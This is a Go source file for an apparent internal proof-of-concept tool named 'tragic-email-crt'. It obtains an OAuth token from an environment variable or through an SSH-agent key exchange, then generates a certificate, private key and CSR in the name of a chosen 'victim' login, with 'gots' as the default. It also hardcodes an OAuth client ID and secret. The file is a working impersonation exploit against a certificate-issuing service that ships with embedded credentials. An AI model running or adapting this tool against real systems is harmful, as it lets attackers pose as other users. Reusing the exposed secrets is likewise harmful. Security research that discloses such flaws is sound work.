package main

import (
	"flag"
	"fmt"
	"io/ioutil"
	"os"
	"os/user"

	"a.yandex-team.ru/junk/buglloc/pocs/tools/tragic-email-crt/internal/certor"
	"a.yandex-team.ru/security/libs/go/oauth_ssh"
	"a.yandex-team.ru/security/libs/go/simplelog"
)

const (
	oAuthSelfClientID = "6644976c1a7b4f04a92a9dc233c0532f"
	oAuthSelfSecret   = "6dc8cea733834d46be1c597c915f05c2"
)

func getOAuthTocken() (token string, err error) {
	token = os.Getenv("CRT_TOKEN")
	if token == "" {
		// Try to get OAuth token from ssh
		token, err = oauth_ssh.ExchangeToken(oAuthSelfClientID, oAuthSelfSecret)
	}
	return
}

func main() {
	oauthToken, err := getOAuthTocken()
	if err != nil {
		simplelog.Error("Can't get oauth token from ENV[CRT_TOKEN] or exchange SSH key from agent.")
		return
	}

	var (
		evilLogin   string
		victimLogin string
	)
	osUser, err := user.Current()
	if err == nil {
		evilLogin = osUser.Name
	}

	flag.StringVar(&evilLogin, "evil", evilLogin, "evil login (must be the same user as the oauth token)")
	flag.StringVar(&victimLogin, "victim", "gots", "victim login")
	flag.Parse()

	crt, err := certor.GenCertificates(certor.GenRequest{
		OAuthToken:  oauthToken,
		VictimLogin: victimLogin,
		EvilLogin:   evilLogin,
	})

	if err != nil {
		simplelog.Error("Ooops, fail", "err", err)
		return
	}

	pubPath := fmt.Sprintf("%s.crt", victimLogin)
	keyPath := fmt.Sprintf("%s.key", victimLogin)
	csrPath := fmt.Sprintf("%s.csr", victimLogin)

	if err := ioutil.WriteFile(csrPath, crt.CsrPem, 0644); err != nil {
		simplelog.Error("Failed to save certificate", "path", csrPath, "err", err.Error())
		return
	}

	if err := ioutil.WriteFile(keyPath, crt.KeyPem, 0644); err != nil {
		simplelog.Error("Failed to save certificate", "path", csrPath, "err", err.Error())
		return
	}

	if err := ioutil.WriteFile(pubPath, crt.PubPem, 0644); err != nil {
		simplelog.Error("Failed to save certificate", "path", csrPath, "err", err.Error())
		return
	}

	fmt.Printf("Certificate for %s generated: \n", victimLogin)
	fmt.Printf("\t%s\n", keyPath)
	fmt.Printf("\t%s\n", csrPath)
	fmt.Printf("\t%s\n", pubPath)
}
